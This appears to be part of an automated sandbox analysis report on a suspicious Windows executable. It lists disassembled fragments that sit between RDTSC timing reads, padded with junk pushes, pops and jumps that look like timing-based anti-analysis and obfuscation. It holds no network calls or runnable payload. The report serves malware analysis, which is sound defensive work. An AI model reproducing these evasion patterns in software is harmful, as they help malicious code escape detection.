Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70EEE second address: 4B70EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60FC3 second address: 4B60FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA06F4 second address: 4BA0718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0084E2F650h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA0718 second address: 4BA0727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40126 second address: 4B4012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B4012C second address: 4B40130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B40130 second address: 4B40134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60C8E second address: 4B60C93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B607DF second address: 4B607E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B607E3 second address: 4B6081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, 49E39B60h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0085357C20h 0x00000017 jmp 00007F0085357C25h 0x0000001c popfd 0x0000001d mov dx, si 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6081F second address: 4B60840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0084E2F64Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60840 second address: 4B60846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60846 second address: 4B6084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6084A second address: 4B6084E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6051F second address: 4B6056A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0084E2F64Bh 0x00000008 sbb eax, 01E1C01Eh 0x0000000e jmp 00007F0084E2F659h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 45E7h 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F0084E2F64Ah 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, ax 0x00000029 push eax 0x0000002a pop edx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA058C second address: 4BA0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA0590 second address: 4BA0596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA0596 second address: 4BA059C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA059C second address: 4BA05A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA05A0 second address: 4BA05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BA05A4 second address: 4BA062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0084E2F64Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F0084E2F653h 0x00000018 add ax, 3E4Eh 0x0000001d jmp 00007F0084E2F659h 0x00000022 popfd 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F0084E2F651h 0x0000002a adc eax, 32EAD286h 0x00000030 jmp 00007F0084E2F651h 0x00000035 popfd 0x00000036 popad 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F0084E2F64Dh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B801F0 second address: 4B80213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0085357C1Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B80213 second address: 4B8024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d pushad 0x0000000e mov dl, ah 0x00000010 push edi 0x00000011 movzx esi, dx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0084E2F653h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6064D second address: 4B6066C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 515E9F7Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0085357C1Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6066C second address: 4B60670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60670 second address: 4B60676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B60676 second address: 4B6067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B6067C second address: 4B60680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DA8 second address: 4B70DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DAC second address: 4B70DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DB0 second address: 4B70DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DB6 second address: 4B70DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DC5 second address: 4B70DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70DC9 second address: 4B70E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F0085357C21h 0x0000000f movzx esi, di 0x00000012 pop edi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 pushad 0x00000017 jmp 00007F0085357C24h 0x0000001c mov eax, 08E821A1h 0x00000021 popad 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0085357C25h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70E22 second address: 4B70E28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70E28 second address: 4B70E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70E3F second address: 4B70E43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8003A second address: 4B8003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8003E second address: 4B80059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F657h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B80059 second address: 4B80071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0085357C24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B80071 second address: 4B800AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e movzx esi, di 0x00000011 jmp 00007F0084E2F651h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0084E2F64Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B800AA second address: 4B800B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B800B0 second address: 4B800B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B800B4 second address: 4B800B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90DCA second address: 4B90DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90DE7 second address: 4B90E36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0085357C23h 0x00000013 or si, DF7Eh 0x00000018 jmp 00007F0085357C29h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90E36 second address: 4B90E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e jmp 00007F0084E2F64Eh 0x00000013 test eax, eax 0x00000015 jmp 00007F0084E2F650h 0x0000001a je 00007F00F71C2140h 0x00000020 jmp 00007F0084E2F650h 0x00000025 mov ecx, eax 0x00000027 jmp 00007F0084E2F650h 0x0000002c xor eax, dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bh, ah 0x00000034 mov dl, CFh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90E9F second address: 4B90ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0085357C1Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and ecx, 1Fh 0x00000010 pushad 0x00000011 mov bl, cl 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0085357C1Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90ECB second address: 4B90EDE instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 ror eax, cl 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx ebx, ax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90EDE second address: 4B90EF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90EF8 second address: 4B90EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90EFC second address: 4B90F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90F00 second address: 4B90F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90F06 second address: 4B90F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [003E2014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F0089B48A67h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0085357C1Ch 0x0000002c adc al, FFFFFFB8h 0x0000002f jmp 00007F0085357C1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 pop eax 0x00000037 jmp 00007F0085357C26h 0x0000003c ret 0x0000003d nop 0x0000003e push eax 0x0000003f call 00007F0089B48A98h 0x00000044 mov edi, edi 0x00000046 jmp 00007F0085357C20h 0x0000004b xchg eax, ebp 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F0085357C1Ch 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90F6B second address: 4B90F92 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 3C51h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 6B994C8Dh 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0084E2F656h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B90F92 second address: 4B90FBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov di, 59F0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F0085357C1Fh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov di, DF76h 0x0000001c push edi 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5004A second address: 4B5006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0084E2F651h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5006F second address: 4B50073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50073 second address: 4B50079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50079 second address: 4B500AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0085357C27h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B500AB second address: 4B5014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 811Ah 0x00000007 mov esi, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007F0084E2F64Ah 0x00000012 mov dword ptr [esp], ecx 0x00000015 jmp 00007F0084E2F650h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F0084E2F650h 0x00000020 push eax 0x00000021 jmp 00007F0084E2F64Bh 0x00000026 xchg eax, ebx 0x00000027 jmp 00007F0084E2F656h 0x0000002c mov ebx, dword ptr [ebp+10h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F0084E2F64Eh 0x00000036 adc ax, D548h 0x0000003b jmp 00007F0084E2F64Bh 0x00000040 popfd 0x00000041 movzx esi, di 0x00000044 popad 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F0084E2F657h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5014B second address: 4B50151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50151 second address: 4B50155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50155 second address: 4B50159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50159 second address: 4B5018E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c mov dl, 8Ch 0x0000000e pushad 0x0000000f mov esi, 3CDDF3ABh 0x00000014 mov esi, 2D061F87h 0x00000019 popad 0x0000001a popad 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F0084E2F64Fh 0x00000026 pop esi 0x00000027 mov ax, bx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5018E second address: 4B501C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F0085357C1Ch 0x0000000b sbb cx, 7F98h 0x00000010 jmp 00007F0085357C1Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b mov bh, ah 0x0000001d mov ax, dx 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501C3 second address: 4B501C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501C7 second address: 4B501CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501CD second address: 4B501F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F64Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov al, 9Dh 0x0000000d mov eax, edx 0x0000000f popad 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 jmp 00007F0084E2F64Ah 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501F8 second address: 4B501FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B501FE second address: 4B50222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F00F71FDA55h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0084E2F654h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50222 second address: 4B50238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50238 second address: 4B50242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50242 second address: 4B50275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 48CFh 0x00000008 popad 0x00000009 popad 0x0000000a je 00007F00F7725FF5h 0x00000010 jmp 00007F0085357C22h 0x00000015 mov edx, dword ptr [esi+44h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0085357C1Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50275 second address: 4B50279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50279 second address: 4B5027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5027F second address: 4B50290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0084E2F64Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50290 second address: 4B502B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502B0 second address: 4B502B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502B4 second address: 4B502C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B502C7 second address: 4B5034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0084E2F64Fh 0x00000009 sbb esi, 038E55FEh 0x0000000f jmp 00007F0084E2F659h 0x00000014 popfd 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test edx, 61000000h 0x00000020 pushad 0x00000021 movzx esi, bx 0x00000024 pushfd 0x00000025 jmp 00007F0084E2F655h 0x0000002a sub al, FFFFFFE6h 0x0000002d jmp 00007F0084E2F651h 0x00000032 popfd 0x00000033 popad 0x00000034 jne 00007F00F71FD999h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F0084E2F64Dh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5034A second address: 4B5034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
